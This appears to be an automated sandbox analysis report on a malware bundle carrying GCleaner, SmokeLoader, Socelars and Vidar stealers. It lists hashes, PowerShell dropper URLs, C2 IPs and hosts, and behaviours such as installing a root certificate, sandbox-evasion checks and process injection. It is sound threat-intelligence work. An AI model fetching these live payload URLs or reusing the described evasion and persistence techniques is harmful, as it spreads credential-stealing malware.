gcleaner | c736b51d529275f2d913f67ae5c5658bea675f2c5e8f3e20cc115e0500bc06cc

Analysis

max time kernel
339s
max time network
347s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
13-10-2023 22:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup Virus.zip
Size

5.6MB
MD5

f28c248eee341079a3b8b1d6b3c6d69f
SHA1

b38bc018c9b1271c7fd1b080e4fc9e21280f0796
SHA256

c736b51d529275f2d913f67ae5c5658bea675f2c5e8f3e20cc115e0500bc06cc
SHA512

53549aca5ba9579e3805ae2374a0a4988ad7b80b071672f07c92bd4fd88ed7dff709b94857caca2a5e7e6c95d29cda4ea70d48101427ac80cdab876def889549
SSDEEP

98304:jQrBbfoRhB9PNDGgr5TrD98alGby1bPkNrYYG+tuttQlv4q3fIvf2FEHaB2GYyMK:jQrtgRL9ZGm558wG+dctw2N4qyWEHaca

Score

10^/10

gcleaner lgoogloader smokeloader socelars vidar 915 pub3 backdoor downloader loader spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.conectiva.pe/doc/config_40.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ndtpro.xyz/nj/config_40.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://efeedor.com/blog/assets/config_40.ps1

Extracted

Family

socelars

https://hdbywe.s3.us-west-2.amazonaws.com/sadew1013/

Extracted

Family

gcleaner

45.139.105.171

85.31.46.167

107.182.129.235

171.22.30.106

Attributes

url_path
....!..../software.php

....!..../software.php

Extracted

Family

smokeloader

Botnet

pub3

Extracted

Family

vidar

Version

55.5

Botnet

915

https://t.me/tg_turgay

https://ioc.exchange/@xiteb15011

Attributes

profile_id
915

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

Detects LgoogLoader payload 1 IoCs

resource	yara_rule
behavioral3/memory/3400-102-0x0000000000AA0000-0x0000000000ACD000-memory.dmp	family_lgoogloader

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
LgoogLoader
A downloader capable of dropping and executing other malware families.
downloader lgoogloader
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000300000001e800-106.dat	family_socelars
behavioral3/files/0x000300000001e800-86.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
134	12284	powershell.exe
135	11560	powershell.exe
137	12220	powershell.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	6368daa76532c_c5c6da.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	6368dae9d03d2_c1e9ecee.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	6368daeb7b488_2f09cc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	6368daee3bb65_7f03c6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	6368daa6531b5_e1a29ac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	6368daecf26a4_6426872a.exe

Executes dropped EXE 18 IoCs

pid	Process
620	setup_install.exe
3400	6368daaff2693_0808cb0878.exe
4104	6368dab1e79de_14526e0fb0.exe
2848	cmd.exe
10296	6368daa937cb8_bfd3ed4d.exe
11260	6368daa76532c_c5c6da.exe
6520	6368daa7d6897_a0d8ae7feb.exe
11232	6368daa6531b5_e1a29ac.exe
11240	6368daabedc01_cd9ff84ca.exe
11224	6368daa709d64_5cde43f.exe
11348	6368daaad0766_61fff63e.exe
11360	6368daee3bb65_7f03c6.exe
11764	6368daeb7b488_2f09cc.exe
11780	6368dae9d03d2_c1e9ecee.exe
11772	6368daecf26a4_6426872a.exe
12148	6368daabedc01_cd9ff84ca.tmp
11488	6368daa6531b5_e1a29ac.exe
12140	6368daaad0766_61fff63e.exe

Loads dropped DLL 8 IoCs

pid	Process
620	setup_install.exe
12148	6368daabedc01_cd9ff84ca.tmp
11584	rundll32.exe
11584	rundll32.exe
11484	rundll32.exe
5988	rundll32.exe
5988	rundll32.exe
6068	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 11348 set thread context of 12140	11348	6368daaad0766_61fff63e.exe	167
PID 4104 set thread context of 10304	4104	6368dab1e79de_14526e0fb0.exe	170

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\background.html	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\icon.png	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\manifest.json	6368daa7d6897_a0d8ae7feb.exe
File opened for modification	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	6368daa7d6897_a0d8ae7feb.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
11840	2848	WerFault.exe	121
11548	10296	WerFault.exe	127
11908	4104	WerFault.exe	124
11268	10296	WerFault.exe	127
2028	10296	WerFault.exe	127
4684	10296	WerFault.exe	127
5304	10296	WerFault.exe	127
5484	10296	WerFault.exe	127
5760	10296	WerFault.exe	127
4596	10296	WerFault.exe	127

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6368daaad0766_61fff63e.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6368daaad0766_61fff63e.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6368daaad0766_61fff63e.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
11324	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings	6368daee3bb65_7f03c6.exe
Key created	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings	6368daecf26a4_6426872a.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	6368daa709d64_5cde43f.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	6368daa709d64_5cde43f.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	6368daa709d64_5cde43f.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
11940	PING.EXE
4440	PING.EXE
2192	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	100	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
10736	powershell.exe
10736	powershell.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
12140	6368daaad0766_61fff63e.exe
12140	6368daaad0766_61fff63e.exe
4092	taskmgr.exe
4092	taskmgr.exe
12220	powershell.exe
11560	powershell.exe
11560	powershell.exe
12220	powershell.exe
12284	powershell.exe
12284	powershell.exe
10736	powershell.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
768	Process not Found
768	Process not Found
4092	taskmgr.exe
768	Process not Found
768	Process not Found
768	Process not Found
768	Process not Found
768	Process not Found
768	Process not Found
768	Process not Found
768	Process not Found
768	Process not Found
768	Process not Found
12284	powershell.exe
768	Process not Found
768	Process not Found
4092	taskmgr.exe
768	Process not Found

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
768	Process not Found
10296	6368daa937cb8_bfd3ed4d.exe
4092	taskmgr.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
12140	6368daaad0766_61fff63e.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4092	taskmgr.exe
Token: SeSystemProfilePrivilege	4092	taskmgr.exe
Token: SeCreateGlobalPrivilege	4092	taskmgr.exe
Token: SeCreateTokenPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeAssignPrimaryTokenPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeLockMemoryPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeIncreaseQuotaPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeMachineAccountPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeTcbPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeSecurityPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeTakeOwnershipPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeLoadDriverPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeSystemProfilePrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeSystemtimePrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeProfSingleProcessPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeIncBasePriorityPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeCreatePagefilePrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeCreatePermanentPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeBackupPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeRestorePrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeShutdownPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeDebugPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeAuditPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeSystemEnvironmentPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeChangeNotifyPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeRemoteShutdownPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeUndockPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeSyncAgentPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeEnableDelegationPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeManageVolumePrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeImpersonatePrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeCreateGlobalPrivilege	6520	6368daa7d6897_a0d8ae7feb.exe
Token: 31	6520	6368daa7d6897_a0d8ae7feb.exe
Token: 32	6520	6368daa7d6897_a0d8ae7feb.exe
Token: 33	6520	6368daa7d6897_a0d8ae7feb.exe
Token: 34	6520	6368daa7d6897_a0d8ae7feb.exe
Token: 35	6520	6368daa7d6897_a0d8ae7feb.exe
Token: SeDebugPrivilege	10736	powershell.exe
Token: SeDebugPrivilege	12220	powershell.exe
Token: SeDebugPrivilege	11560	powershell.exe
Token: SeDebugPrivilege	12284	powershell.exe
Token: SeDebugPrivilege	11324	taskkill.exe
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found
Token: SeShutdownPrivilege	768	Process not Found
Token: SeCreatePagefilePrivilege	768	Process not Found

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe
4092	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4168 wrote to memory of 620	4168	setup_installer.exe	114
PID 4168 wrote to memory of 620	4168	setup_installer.exe	114
PID 4168 wrote to memory of 620	4168	setup_installer.exe	114
PID 620 wrote to memory of 1612	620	setup_install.exe	116
PID 620 wrote to memory of 1612	620	setup_install.exe	116
PID 620 wrote to memory of 1612	620	setup_install.exe	116
PID 620 wrote to memory of 1844	620	setup_install.exe	117
PID 620 wrote to memory of 1844	620	setup_install.exe	117
PID 620 wrote to memory of 1844	620	setup_install.exe	117
PID 620 wrote to memory of 3332	620	setup_install.exe	155
PID 620 wrote to memory of 3332	620	setup_install.exe	155
PID 620 wrote to memory of 3332	620	setup_install.exe	155
PID 620 wrote to memory of 4676	620	setup_install.exe	118
PID 620 wrote to memory of 4676	620	setup_install.exe	118
PID 620 wrote to memory of 4676	620	setup_install.exe	118
PID 620 wrote to memory of 4328	620	setup_install.exe	154
PID 620 wrote to memory of 4328	620	setup_install.exe	154
PID 620 wrote to memory of 4328	620	setup_install.exe	154
PID 620 wrote to memory of 4696	620	setup_install.exe	153
PID 620 wrote to memory of 4696	620	setup_install.exe	153
PID 620 wrote to memory of 4696	620	setup_install.exe	153
PID 620 wrote to memory of 1916	620	setup_install.exe	119
PID 620 wrote to memory of 1916	620	setup_install.exe	119
PID 620 wrote to memory of 1916	620	setup_install.exe	119
PID 620 wrote to memory of 3660	620	setup_install.exe	152
PID 620 wrote to memory of 3660	620	setup_install.exe	152
PID 620 wrote to memory of 3660	620	setup_install.exe	152
PID 620 wrote to memory of 4828	620	setup_install.exe	144
PID 620 wrote to memory of 4828	620	setup_install.exe	144
PID 620 wrote to memory of 4828	620	setup_install.exe	144
PID 620 wrote to memory of 4432	620	setup_install.exe	142
PID 620 wrote to memory of 4432	620	setup_install.exe	142
PID 620 wrote to memory of 4432	620	setup_install.exe	142
PID 620 wrote to memory of 3352	620	setup_install.exe	141
PID 620 wrote to memory of 3352	620	setup_install.exe	141
PID 620 wrote to memory of 3352	620	setup_install.exe	141
PID 620 wrote to memory of 3168	620	setup_install.exe	140
PID 620 wrote to memory of 3168	620	setup_install.exe	140
PID 620 wrote to memory of 3168	620	setup_install.exe	140
PID 620 wrote to memory of 4416	620	setup_install.exe	126
PID 620 wrote to memory of 4416	620	setup_install.exe	126
PID 620 wrote to memory of 4416	620	setup_install.exe	126
PID 620 wrote to memory of 3792	620	setup_install.exe	125
PID 620 wrote to memory of 3792	620	setup_install.exe	125
PID 620 wrote to memory of 3792	620	setup_install.exe	125
PID 620 wrote to memory of 3980	620	setup_install.exe	123
PID 620 wrote to memory of 3980	620	setup_install.exe	123
PID 620 wrote to memory of 3980	620	setup_install.exe	123
PID 4432 wrote to memory of 3400	4432	cmd.exe	122
PID 4432 wrote to memory of 3400	4432	cmd.exe	122
PID 4432 wrote to memory of 3400	4432	cmd.exe	122
PID 3352 wrote to memory of 4104	3352	cmd.exe	124
PID 3352 wrote to memory of 4104	3352	cmd.exe	124
PID 3352 wrote to memory of 4104	3352	cmd.exe	124
PID 4828 wrote to memory of 2848	4828	cmd.exe	169
PID 4828 wrote to memory of 2848	4828	cmd.exe	169
PID 4828 wrote to memory of 2848	4828	cmd.exe	169
PID 4696 wrote to memory of 10296	4696	cmd.exe	127
PID 4696 wrote to memory of 10296	4696	cmd.exe	127
PID 4696 wrote to memory of 10296	4696	cmd.exe	127
PID 1612 wrote to memory of 10736	1612	cmd.exe	128
PID 1612 wrote to memory of 10736	1612	cmd.exe	128
PID 1612 wrote to memory of 10736	1612	cmd.exe	128
PID 4676 wrote to memory of 11260	4676	cmd.exe	139

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Setup Virus.zip"
1⤵
PID:928

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4732

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4092

C:\Users\Admin\Desktop\setup_installer.exe
